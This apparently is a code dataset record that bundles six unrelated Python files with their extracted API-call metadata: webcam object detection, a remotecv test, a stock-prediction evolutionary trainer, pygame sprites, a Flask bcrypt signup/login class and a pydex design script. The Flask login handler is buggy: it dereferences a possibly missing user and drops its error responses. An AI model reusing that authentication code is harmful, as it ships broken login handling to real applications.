[((540, 563), 'h5py.File', 'h5py.File', (['h5_path', '"""r"""'], {}), "(h5_path, 'r')\n", (549, 563), False, 'import h5py\n'), ((863, 915), 'datetime.datetime.utcfromtimestamp', 'dt.datetime.utcfromtimestamp', (["h5.attrs['start_time']"], {}), "(h5.attrs['start_time'])\n", (891, 915), True, 'import datetime as dt\n'), ((820, 840), 'pytz.timezone', 'pytz.timezone', (['"""UTC"""'], {}), "('UTC')\n", (833, 840), False, 'import pytz\n'), ((1011, 1042), 'datetime.datetime.utcfromtimestamp', 'dt.datetime.utcfromtimestamp', (['(0)'], {}), '(0)\n', (1039, 1042), True, 'import datetime as dt\n'), ((968, 988), 'pytz.timezone', 'pytz.timezone', (['"""UTC"""'], {}), "('UTC')\n", (981, 988), False, 'import pytz\n')]
|
import cv2
import numpy as np
import os
# import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import pathlib
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_model(model_name):
model = tf.saved_model.load(
'/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/')
return model
PATH_TO_LABELS = '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/labelmap.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(
PATH_TO_LABELS, use_display_name=True)
model_name = 'saved_model.pb'
detection_model = load_model(model_name)
def run_inference_for_single_image(model, image):
image = np.asarray(image)
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(image)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Run inference
model_fn = model.signatures['serving_default']
output_dict = model_fn(input_tensor)
# All outputs are batches tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
output_dict['num_detections'] = num_detections
# detection_classes should be ints.
output_dict['detection_classes'] = output_dict['detection_classes'].astype(
np.int64)
# Handle models with masks:
if 'detection_masks' in output_dict:
# Reframe the the bbox mask to the image size.
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
output_dict['detection_masks'], output_dict['detection_boxes'],
image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5,
tf.uint8)
output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()
return output_dict
def show_inference(model, frame):
# take the frame from webcam feed and convert that to array
image_np = np.array(frame)
# Actual detection.
output_dict = run_inference_for_single_image(model, image_np)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks_reframed', None),
use_normalized_coordinates=True,
line_thickness=2)
return(image_np)
video_capture = cv2.VideoCapture(0)
while True:
# Capture frame-by-frame
re, frame = video_capture.read()
Imagenp = show_inference(detection_model, frame)
cv2.imshow('object detection', Imagenp)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
# cv2.resize(Imagenp, (800,600)
|
[
"cv2.waitKey",
"tensorflow.convert_to_tensor",
"numpy.asarray",
"cv2.imshow",
"object_detection.utils.label_map_util.create_category_index_from_labelmap",
"cv2.VideoCapture",
"object_detection.utils.ops.reframe_box_masks_to_image_masks",
"tensorflow.cast",
"numpy.array",
"cv2.destroyAllWindows",
"tensorflow.saved_model.load"
] |
[((801, 894), 'object_detection.utils.label_map_util.create_category_index_from_labelmap', 'label_map_util.create_category_index_from_labelmap', (['PATH_TO_LABELS'], {'use_display_name': '(True)'}), '(PATH_TO_LABELS,\n use_display_name=True)\n', (851, 894), False, 'from object_detection.utils import label_map_util\n'), ((3196, 3215), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (3212, 3215), False, 'import cv2\n'), ((3471, 3494), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3492, 3494), False, 'import cv2\n'), ((522, 649), 'tensorflow.saved_model.load', 'tf.saved_model.load', (['"""/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/"""'], {}), "(\n '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/'\n )\n", (541, 649), True, 'import tensorflow as tf\n'), ((1032, 1049), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (1042, 1049), True, 'import numpy as np\n'), ((1148, 1175), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image'], {}), '(image)\n', (1168, 1175), True, 'import tensorflow as tf\n'), ((2637, 2652), 'numpy.array', 'np.array', (['frame'], {}), '(frame)\n', (2645, 2652), True, 'import numpy as np\n'), ((3351, 3390), 'cv2.imshow', 'cv2.imshow', (['"""object detection"""', 'Imagenp'], {}), "('object detection', Imagenp)\n", (3361, 3390), False, 'import cv2\n'), ((2123, 2265), 'object_detection.utils.ops.reframe_box_masks_to_image_masks', 'utils_ops.reframe_box_masks_to_image_masks', (["output_dict['detection_masks']", "output_dict['detection_boxes']", 'image.shape[0]', 'image.shape[1]'], {}), "(output_dict['detection_masks'],\n output_dict['detection_boxes'], image.shape[0], image.shape[1])\n", (2165, 2265), True, 'from object_detection.utils import ops as utils_ops\n'), ((2322, 2371), 'tensorflow.cast', 'tf.cast', (['(detection_masks_reframed > 0.5)', 'tf.uint8'], {}), '(detection_masks_reframed > 0.5, tf.uint8)\n', (2329, 2371), True, 'import tensorflow as tf\n'), ((3398, 3412), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3409, 3412), False, 'import cv2\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mock
from preggy import expect
from unittest import TestCase
from tests import read_fixture
from remotecv.pyres_tasks import DetectTask
from remotecv.utils import config
class DetectTaskTestCase(TestCase):
def test_should_run_detector_task(self):
store_mock = mock.Mock()
config.loader = mock.Mock(load_sync=read_fixture)
config.store = store_mock
config.store.ResultStore = mock.Mock(return_value=store_mock)
DetectTask.perform('all', 'multiple_faces_bw.jpg', 'test-key')
call = store_mock.store.call_args[0]
expect(call[0]).to_equal('test-key')
expect(call[1]).to_be_greater_than(20)
expect(call[1][0][0]).to_be_numeric()
expect(call[1][0][1]).to_be_numeric()
expect(call[1][0][2]).to_be_numeric()
expect(call[1][0][3]).to_be_numeric()
|
[
"preggy.expect",
"mock.Mock",
"remotecv.pyres_tasks.DetectTask.perform"
] |
[((326, 337), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (335, 337), False, 'import mock\n'), ((362, 395), 'mock.Mock', 'mock.Mock', ([], {'load_sync': 'read_fixture'}), '(load_sync=read_fixture)\n', (371, 395), False, 'import mock\n'), ((465, 499), 'mock.Mock', 'mock.Mock', ([], {'return_value': 'store_mock'}), '(return_value=store_mock)\n', (474, 499), False, 'import mock\n'), ((508, 570), 'remotecv.pyres_tasks.DetectTask.perform', 'DetectTask.perform', (['"""all"""', '"""multiple_faces_bw.jpg"""', '"""test-key"""'], {}), "('all', 'multiple_faces_bw.jpg', 'test-key')\n", (526, 570), False, 'from remotecv.pyres_tasks import DetectTask\n'), ((624, 639), 'preggy.expect', 'expect', (['call[0]'], {}), '(call[0])\n', (630, 639), False, 'from preggy import expect\n'), ((669, 684), 'preggy.expect', 'expect', (['call[1]'], {}), '(call[1])\n', (675, 684), False, 'from preggy import expect\n'), ((716, 737), 'preggy.expect', 'expect', (['call[1][0][0]'], {}), '(call[1][0][0])\n', (722, 737), False, 'from preggy import expect\n'), ((762, 783), 'preggy.expect', 'expect', (['call[1][0][1]'], {}), '(call[1][0][1])\n', (768, 783), False, 'from preggy import expect\n'), ((808, 829), 'preggy.expect', 'expect', (['call[1][0][2]'], {}), '(call[1][0][2])\n', (814, 829), False, 'from preggy import expect\n'), ((854, 875), 'preggy.expect', 'expect', (['call[1][0][3]'], {}), '(call[1][0][3])\n', (860, 875), False, 'from preggy import expect\n')]
|
"""
"""
from configparser import ConfigParser, SectionProxy
from os import path
import os
from typing import List, Tuple, Any, Optional, Dict
import numpy as np
import tqdm
from general_utils.config import config_util, config_parser_singleton
from general_utils.exportation import csv_exportation
from general_utils.logging import logger
from data_providing_module import configurable_registry, data_provider_registry
from data_providing_module.data_providers import data_provider_static_names
from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation
CONSUMER_ID = "Evolutionary Computation Trainer"
_ENABLED_CONFIGURATION_IDENTIFIER = 'enabled'
_EXAMPLE_COMBINATION_FACTOR_IDENTIFIER = 'Periods Per Example'
_TDP_BLOCK_LENGTH_IDENTIFIER = "trend deterministic data provider block length"
_NUM_EPOCHS_IDENTIFIER = "Number of Epochs"
_NUM_INDIVIDUALS_IDENTIFIER = "Number of Individuals in Evolutionary Population"
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER = "Model Saving Epoch Interval"
_TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER = "Days Per Example"
_MUTATION_CHANCE_IDENTIFIER = "Mutation Chance Per Genome"
_MUTATION_MAGNITUDE_IDENTIFIER = "Mutation Magnitude"
_CROSSOVER_CHANCE_IDENTIFIER = "Crossover Chance Per Genome"
_CONFIGURABLE_IDENTIFIERS = [_ENABLED_CONFIGURATION_IDENTIFIER, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER,
_TDP_BLOCK_LENGTH_IDENTIFIER, _NUM_EPOCHS_IDENTIFIER, _NUM_INDIVIDUALS_IDENTIFIER,
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER, _TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER,
_MUTATION_CHANCE_IDENTIFIER, _MUTATION_MAGNITUDE_IDENTIFIER, _CROSSOVER_CHANCE_IDENTIFIER]
_CONFIGURATION_DEFAULTS = ['False', '22', '2520', '100', '100', '5', '5', '.1', '.15', '.5']
def string_serialize_predictions(predictions) -> str:
ret_str = ""
ticker_prediction_template = "{}:{}\n"
individual_prediction_template = "{}:\n\t\tBuy: {}\n\t\tSell: {}\n\t\tAccuracies: {:.2f}, {:.2f}"
for ticker, data in predictions.items():
ticker_predictions, accuracies = data
serialized_individual_predictions = []
for i in range(len(ticker_predictions)):
indicate_buy = ticker_predictions[i][0] == 1
indicate_sell = ticker_predictions[i][1] == 1
serialized_individual_predictions.append(
individual_prediction_template.format(i+1, indicate_buy, indicate_sell,
accuracies[i][0], accuracies[i][1])
)
expanded_template = ticker_prediction_template.format(ticker, "\n\t{}" * len(ticker_predictions))
ret_str += expanded_template.format(*serialized_individual_predictions)
return ret_str
def export_predictions(predictions, output_dir) -> None:
out_file = output_dir + path.sep + "ec.csv"
exportation_columns = []
for ticker, prediction_data in predictions.items():
actual_predictions, observed_accuracies = prediction_data
actual_predictions = np.where(actual_predictions == 1, True, False)
exportation_columns.append((ticker, "", ""))
for i in range(len(actual_predictions)):
exportation_columns.append((",Model:", str(i)))
exportation_columns.append((",Buy:", str(actual_predictions[i][0])))
exportation_columns.append((",Buy Accuracy:", str(observed_accuracies[i][0])))
exportation_columns.append((",Sell:", str(actual_predictions[i][1])))
exportation_columns.append((",Sell Accuracy:", str(observed_accuracies[i][1])))
with open(out_file, 'w') as handle:
for column in exportation_columns:
handle.write(",".join(column) + '\n')
def prediction_truth_calculation(predictions: List[np.ndarray],
closing_prices: List[float],
num_days_per_prediction: int = 5):
prediction_entry = Tuple[List[np.ndarray], float, List[List[bool]]]
prediction_array: List[Optional[prediction_entry]] = [None] * (num_days_per_prediction+1)
current_index = 0
ret = []
for i in range(len(predictions)):
for j in range(1, len(prediction_array)):
index = (j + current_index) % len(prediction_array)
if prediction_array[index] is None:
continue
for k in range(len(prediction_array[index][0])):
prediction, reference_price, prediction_truths = prediction_array[index]
prediction = prediction[k]
prediction_truths = prediction_truths[k]
if reference_price < closing_prices[i]:
if prediction[0]:
prediction_truths[0] = True
if not prediction[1]:
prediction_truths[1] = True
elif reference_price > closing_prices[i]:
if not prediction[0]:
prediction_truths[0] = True
if prediction[1]:
prediction_truths[1] = True
if prediction_array[current_index] is not None:
prediction_truth = prediction_array[current_index][-1]
ret.append(prediction_truth)
prediction_array[current_index] = ([*predictions[i]], closing_prices[i], [[False, False]] * len(predictions[i]))
current_index += 1
current_index %= len(prediction_array)
return ret
def extract_accuracy_from_prediction_truths(prediction_truths: List[List[List[bool]]]):
ret = np.zeros((len(prediction_truths[0]), len(prediction_truths[0][0])))
for i in range(len(prediction_truths)):
for prediction_index, truths in enumerate(prediction_truths[i]):
for index, truth in enumerate(truths):
if truth:
ret[prediction_index][index] += 1
ret /= len(prediction_truths)
return ret
class EvolutionaryComputationManager(data_provider_registry.DataConsumerBase):
def __init__(self):
super().__init__()
configurable_registry.config_registry.register_configurable(self)
self.__contained_population: Optional[TradingPopulation] = None
self.__periods_per_example = 5
self.__num_epochs = 100
self.__num_individuals = 100
self.__save_interval = 5
self.__mutation_chance = .1
self.__mutation_magnitude = .15
self.__crossover_chance = .5
def consume_data(self, data: Dict[str, Tuple[np.ndarray, List[float]]], passback, output_dir):
out_dir = output_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(out_dir):
os.mkdir(out_dir)
previous_model_file = out_dir + path.sep + "evolution_individuals.ecp"
if path.exists(previous_model_file):
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(previous_model_file)
else:
num_indicators = len(data[next(iter(data.keys()))][0])
input_shape = (num_indicators, self.__periods_per_example)
self.__contained_population = TradingPopulation(input_shape, 1000, self.__num_individuals,
self.__mutation_chance, self.__mutation_magnitude,
self.__crossover_chance)
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
self.__train_model(consolidated_data, previous_model_file)
self.__contained_population.save(previous_model_file)
def __print_best_fitness_by_ticker(self, best_fitness_by_ticker: Dict[str, List[float]]) -> None:
output_template = "{ticker}:\n\t{:.2f}\n\t{:.2f}\n\t{:.2f}\n"
for ticker, fitness in best_fitness_by_ticker.items():
logger.logger.log(logger.INFORMATION, output_template.format(
ticker=ticker, *fitness
))
def __train_model(self, consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]], previous_model_file: str):
for i in tqdm.tqdm(range(self.__num_epochs)):
best_fitness_by_ticker = {}
for ticker, ticker_data in consolidated_data.items():
daily_data, closing_prices = ticker_data
best_fitness = self.__contained_population.train(daily_data, 1, closing_prices)
best_fitness_by_ticker[ticker] = best_fitness
self.__print_best_fitness_by_ticker(best_fitness_by_ticker)
if i % self.__save_interval == 0:
self.__contained_population.save(previous_model_file)
self.__contained_population.save(previous_model_file)
def predict_data(self, data, passback, in_model_dir):
in_dir = in_model_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(in_dir):
raise FileNotFoundError("Model storage directory for EC prediction does not exist. Please run"
"Model Creation Main without the prediction flag set to True, and with the"
"EC Manager's Enabled config to True to create models."
)
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(in_dir + path.sep + 'evolution_individuals.ecp')
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
predictions = {}
for ticker, prediction_data in consolidated_data.items():
daily_data, closing_prices = prediction_data
model_predictions = []
for i in range(len(daily_data)):
prediction = self.__contained_population.predict(daily_data[i])
model_predictions.append(prediction)
truths = prediction_truth_calculation(model_predictions[:-1], closing_prices)
accuracies = extract_accuracy_from_prediction_truths(truths)
prediction = self.__contained_population.predict(daily_data[-1])
predictions[ticker] = (prediction, accuracies)
return predictions
def load_configuration(self, parser: "ConfigParser"):
section = config_util.create_type_section(parser, self)
for identifier in _CONFIGURABLE_IDENTIFIERS:
if not parser.has_option(section.name, identifier):
self.write_default_configuration(section)
enabled = parser.getboolean(section.name, _ENABLED_CONFIGURATION_IDENTIFIER)
self.__periods_per_example = parser.getint(section.name, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER)
self.__num_individuals = parser.getint(section.name, _NUM_INDIVIDUALS_IDENTIFIER)
self.__num_epochs = parser.getint(section.name, _NUM_EPOCHS_IDENTIFIER)
self.__save_interval = parser.getint(section.name, _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER)
self.__mutation_chance = parser.getfloat(section.name, _MUTATION_CHANCE_IDENTIFIER)
self.__mutation_magnitude = parser.getfloat(section.name, _MUTATION_MAGNITUDE_IDENTIFIER)
self.__crossover_chance = parser.getfloat(section.name, _CROSSOVER_CHANCE_IDENTIFIER)
block_length = parser.getint(section.name, _TDP_BLOCK_LENGTH_IDENTIFIER)
if enabled:
data_provider_registry.registry.register_consumer(
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
self,
[block_length],
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
keyword_args={'ema_period': [10, 15, 20]},
data_exportation_function=export_predictions,
prediction_string_serializer=string_serialize_predictions
)
def write_default_configuration(self, section: "SectionProxy"):
for i in range(len(_CONFIGURABLE_IDENTIFIERS)):
if not _CONFIGURABLE_IDENTIFIERS[i] in section:
section[_CONFIGURABLE_IDENTIFIERS[i]] = _CONFIGURATION_DEFAULTS[i]
def construct_examples(self, daily_data: np.ndarray, closing_prices: List[float]) -> Tuple[np.ndarray, List[float]]:
ret_daily_data = np.zeros((
daily_data.shape[1] - self.__periods_per_example + 1,
len(daily_data),
self.__periods_per_example
))
for i in range(self.__periods_per_example, daily_data.shape[1]+1):
ret_daily_data[i - self.__periods_per_example] = daily_data[:, i - self.__periods_per_example: i]
return ret_daily_data, closing_prices[self.__periods_per_example-1:]
if "testing" not in os.environ:
consumer = EvolutionaryComputationManager()
|
[
"os.mkdir",
"data_providing_module.data_provider_registry.registry.register_consumer",
"data_providing_module.configurable_registry.config_registry.register_configurable",
"os.path.exists",
"numpy.where",
"stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation",
"general_utils.config.config_util.create_type_section"
] |
[((3132, 3178), 'numpy.where', 'np.where', (['(actual_predictions == 1)', '(True)', '(False)'], {}), '(actual_predictions == 1, True, False)\n', (3140, 3178), True, 'import numpy as np\n'), ((6217, 6282), 'data_providing_module.configurable_registry.config_registry.register_configurable', 'configurable_registry.config_registry.register_configurable', (['self'], {}), '(self)\n', (6276, 6282), False, 'from data_providing_module import configurable_registry, data_provider_registry\n'), ((6957, 6989), 'os.path.exists', 'path.exists', (['previous_model_file'], {}), '(previous_model_file)\n', (6968, 6989), False, 'from os import path\n'), ((9688, 9719), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (9705, 9719), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((10862, 10907), 'general_utils.config.config_util.create_type_section', 'config_util.create_type_section', (['parser', 'self'], {}), '(parser, self)\n', (10893, 10907), False, 'from general_utils.config import config_util, config_parser_singleton\n'), ((6812, 6832), 'os.path.exists', 'path.exists', (['out_dir'], {}), '(out_dir)\n', (6823, 6832), False, 'from os import path\n'), ((6847, 6864), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (6855, 6864), False, 'import os\n'), ((7034, 7065), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (7051, 7065), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((7331, 7472), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['input_shape', '(1000)', 'self.__num_individuals', 'self.__mutation_chance', 'self.__mutation_magnitude', 'self.__crossover_chance'], {}), '(input_shape, 1000, self.__num_individuals, self.\n __mutation_chance, self.__mutation_magnitude, self.__crossover_chance)\n', (7348, 7472), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((9275, 9294), 'os.path.exists', 'path.exists', (['in_dir'], {}), '(in_dir)\n', (9286, 9294), False, 'from os import path\n'), ((11958, 12342), 'data_providing_module.data_provider_registry.registry.register_consumer', 'data_provider_registry.registry.register_consumer', (['data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID', 'self', '[block_length]', 'data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID'], {'keyword_args': "{'ema_period': [10, 15, 20]}", 'data_exportation_function': 'export_predictions', 'prediction_string_serializer': 'string_serialize_predictions'}), "(data_provider_static_names\n .CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID, self, [block_length],\n data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,\n keyword_args={'ema_period': [10, 15, 20]}, data_exportation_function=\n export_predictions, prediction_string_serializer=\n string_serialize_predictions)\n", (12007, 12342), False, 'from data_providing_module import configurable_registry, data_provider_registry\n')]
|
import pygame
size = width, height = 350,500 #Screen Size
class Background(pygame.sprite.Sprite):
def __init__(self, image_file, location):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.image = pygame.image.load(image_file)
self.rect = self.image.get_rect()
self.rect.left, self.rect.top = location
class Straw_class (pygame.sprite.Sprite):
def __init__(self, start_x, start_y, size_x, size_y,inverted):
super().__init__()
self.image = pygame.transform.scale(pygame.image.load('Images/canudo_mal_feito.png'), (size_x,size_y))
if inverted: self.image = pygame.transform.rotozoom(self.image,180,1)
self.rect = self.image.get_rect()
self.rect.move_ip((start_x,start_y))
self.vel = [0, 0]
self.accel = [-4,0]
def update(self):
self.vel[0] = self.accel[0]
self.vel[1] = self.accel[1]
self.rect.move_ip(*self.vel)
|
[
"pygame.image.load",
"pygame.transform.rotozoom",
"pygame.sprite.Sprite.__init__"
] |
[((153, 188), 'pygame.sprite.Sprite.__init__', 'pygame.sprite.Sprite.__init__', (['self'], {}), '(self)\n', (182, 188), False, 'import pygame\n'), ((236, 265), 'pygame.image.load', 'pygame.image.load', (['image_file'], {}), '(image_file)\n', (253, 265), False, 'import pygame\n'), ((540, 588), 'pygame.image.load', 'pygame.image.load', (['"""Images/canudo_mal_feito.png"""'], {}), "('Images/canudo_mal_feito.png')\n", (557, 588), False, 'import pygame\n'), ((641, 686), 'pygame.transform.rotozoom', 'pygame.transform.rotozoom', (['self.image', '(180)', '(1)'], {}), '(self.image, 180, 1)\n', (666, 686), False, 'import pygame\n')]
|
from flask import Flask, request, make_response
import re
from app import db, bcrypt
from pkg.models.auth_models import user
from pkg.helpers.authentication import generateToken
class Auth:
def init(self):
pass
def signup(self):
name = request.json['name']
email = request.json['email']
unhashed_password = request.json['password']
password = bcrypt.generate_password_hash(
unhashed_password).decode('utf-8')
if(len(email) < 1):
return make_response({
'status': 400,
'data': {
'message': "Email is requred",
}
}, 400)
elif(len(password) < 6):
return make_response({
'status': 400,
'data': {
'message': "Password must be 6 or more characters",
}
}, 400)
elif(re.search("^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$", email)):
response = user.query.filter_by(email=email).first()
if(response):
return make_response({
'status': 409,
'data': {
'error': 'User already exists'
}
}, 409)
else:
new_user = user(name, email, password)
db.session.add(new_user)
db.session.commit()
auth_user = {
'id': new_user.id,
'name': new_user.name,
'email': new_user.email,
}
return make_response({
'status': 201,
'data': {
'user': {
**auth_user,
'token': generateToken(auth_user)
}
}
}, 201)
else:
# email is not valid
return make_response({
'status': 400,
'data': {
'message': "Email is invalid",
}
}, 400)
def login(self):
email = request.json['email']
unhashed_password = request.json['password']
response = user.query.filter_by(email=email).first()
password = response.password
if(not response):
make_response({
'status': 404,
'data': {
'message': 'User not found',
}
}, 404)
elif(not bcrypt.check_password_hash(password, unhashed_password)):
make_response({
'status': 400,
'data': {
'message': 'Invalid login credentials',
}
}, 400)
else:
auth_user = {
'id': response.id,
'name': response.name,
'email': response.email,
}
return make_response({
'status': 200,
'data': {
'user': {
**auth_user,
'token': generateToken(auth_user)
}
}
}, 200)
auth = Auth()
|
[
"pkg.models.auth_models.user",
"app.bcrypt.generate_password_hash",
"app.bcrypt.check_password_hash",
"pkg.models.auth_models.user.query.filter_by",
"app.db.session.commit",
"flask.make_response",
"pkg.helpers.authentication.generateToken",
"re.search",
"app.db.session.add"
] |
[((520, 596), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Email is requred'}}", '(400)'], {}), "({'status': 400, 'data': {'message': 'Email is requred'}}, 400)\n", (533, 596), False, 'from flask import Flask, request, make_response\n'), ((2418, 2492), 'flask.make_response', 'make_response', (["{'status': 404, 'data': {'message': 'User not found'}}", '(404)'], {}), "({'status': 404, 'data': {'message': 'User not found'}}, 404)\n", (2431, 2492), False, 'from flask import Flask, request, make_response\n'), ((394, 442), 'app.bcrypt.generate_password_hash', 'bcrypt.generate_password_hash', (['unhashed_password'], {}), '(unhashed_password)\n', (423, 442), False, 'from app import db, bcrypt\n'), ((734, 835), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Password must be 6 or more characters'}}", '(400)'], {}), "({'status': 400, 'data': {'message':\n 'Password must be 6 or more characters'}}, 400)\n", (747, 835), False, 'from flask import Flask, request, make_response\n'), ((930, 999), 're.search', 're.search', (['"""^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,}$"""', 'email'], {}), "('^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,}$', email)\n", (939, 999), False, 'import re\n'), ((2300, 2333), 'pkg.models.auth_models.user.query.filter_by', 'user.query.filter_by', ([], {'email': 'email'}), '(email=email)\n', (2320, 2333), False, 'from pkg.models.auth_models import user\n'), ((2596, 2651), 'app.bcrypt.check_password_hash', 'bcrypt.check_password_hash', (['password', 'unhashed_password'], {}), '(password, unhashed_password)\n', (2622, 2651), False, 'from app import db, bcrypt\n'), ((2666, 2755), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Invalid login credentials'}}", '(400)'], {}), "({'status': 400, 'data': {'message':\n 'Invalid login credentials'}}, 400)\n", (2679, 2755), False, 'from flask import Flask, request, make_response\n'), ((2005, 2081), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Email is invalid'}}", '(400)'], {}), "({'status': 400, 'data': {'message': 'Email is invalid'}}, 400)\n", (2018, 2081), False, 'from flask import Flask, request, make_response\n'), ((1116, 1193), 'flask.make_response', 'make_response', (["{'status': 409, 'data': {'error': 'User already exists'}}", '(409)'], {}), "({'status': 409, 'data': {'error': 'User already exists'}}, 409)\n", (1129, 1193), False, 'from flask import Flask, request, make_response\n'), ((1343, 1370), 'pkg.models.auth_models.user', 'user', (['name', 'email', 'password'], {}), '(name, email, password)\n', (1347, 1370), False, 'from pkg.models.auth_models import user\n'), ((1388, 1412), 'app.db.session.add', 'db.session.add', (['new_user'], {}), '(new_user)\n', (1402, 1412), False, 'from app import db, bcrypt\n'), ((1429, 1448), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1446, 1448), False, 'from app import db, bcrypt\n'), ((1024, 1057), 'pkg.models.auth_models.user.query.filter_by', 'user.query.filter_by', ([], {'email': 'email'}), '(email=email)\n', (1044, 1057), False, 'from pkg.models.auth_models import user\n'), ((3199, 3223), 'pkg.helpers.authentication.generateToken', 'generateToken', (['auth_user'], {}), '(auth_user)\n', (3212, 3223), False, 'from pkg.helpers.authentication import generateToken\n'), ((1842, 1866), 'pkg.helpers.authentication.generateToken', 'generateToken', (['auth_user'], {}), '(auth_user)\n', (1855, 1866), False, 'from pkg.helpers.authentication import generateToken\n')]
|
import numpy as np
from pydex.core.designer import Designer
def simulate(ti_controls, model_parameters):
return np.array([
np.exp(model_parameters[0] * ti_controls[0])
])
designer = Designer()
designer.simulate = simulate
reso = 21j
tic = np.mgrid[0:1:reso]
designer.ti_controls_candidates = np.array([tic]).T
np.random.seed(123)
n_scr = 100
designer.model_parameters = np.random.normal(loc=-1, scale=0.50, size=(n_scr, 1))
designer.initialize(verbose=2)
"""
Pseudo-bayesian type do not really matter in this case because only a single model
parameter is involved i.e, information is a scalar, all criterion becomes equivalent to
the information matrix itself.
"""
pb_type = 0
# pb_type = 1
designer.design_experiment(
designer.d_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.a_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.e_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.show_plots()
|
[
"numpy.random.seed",
"pydex.core.designer.Designer",
"numpy.array",
"numpy.exp",
"numpy.random.normal"
] |
